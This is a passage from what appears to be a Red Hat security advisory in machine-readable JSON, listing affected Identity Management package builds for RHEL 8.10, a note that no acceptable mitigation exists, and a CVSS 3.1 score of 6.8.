"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:3267"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options don\u0027t meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:custodia-0.6.0-3.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:custodia-0.6.0-3.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-4.9.13-9.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-4.9.13-9.module+el8.10.0+21692+c9b201bc.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-common-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-common-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0.12-3.module+el8.9.0+19634+c162f948.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0.12-3.module+el8.9.0+19634+c162f948.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0.12-3.module+el8.9.0+19692+fac39a03.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-core-0.12-3.module+el8.9.0+19634+c162f948.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-core-0.12-3.module+el8.9.0+19692+fac39a03.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-python-compat-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-python-compat-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-selinux-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-selinux-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-dns-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-jwcrypto-0.5.0-2.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-jwcrypto-0.5.0-2.module+el8.10.0+21692+c9b201bc.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python-kdcproxy-0.4-5.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-qrcode-5.1-12.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-qrcode-5.1-12.module+el8.9.0+18920+2223d05e.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python-yubico-1.3.2-9.1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-yubico-1.3.2-9.1.module+el8.9.0+18920+2223d05e.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-custodia-0.6.0-3.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaclient-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaclient-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipalib-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipalib-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaserver-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipatests-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-jwcrypto-0.5.0-2.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-jwcrypto-0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-kdcproxy-0.4-5.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pyusb-1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pyusb-1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-5.1-12.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-5.1-12.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-core-5.1-12.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-core-5.1-12.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-yubico-1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-yubico-1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:pyusb-1.0.0-9.1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:pyusb-1.0.0-9.1.module+el8.9.0+18920+2223d05e.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:custodia-0.6.0-3.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:custodia-0.6.0-3.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-4.9.13-9.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-4.9.13-9.module+el8.10.0+21692+c9b201bc.src.rpm-idm:client",
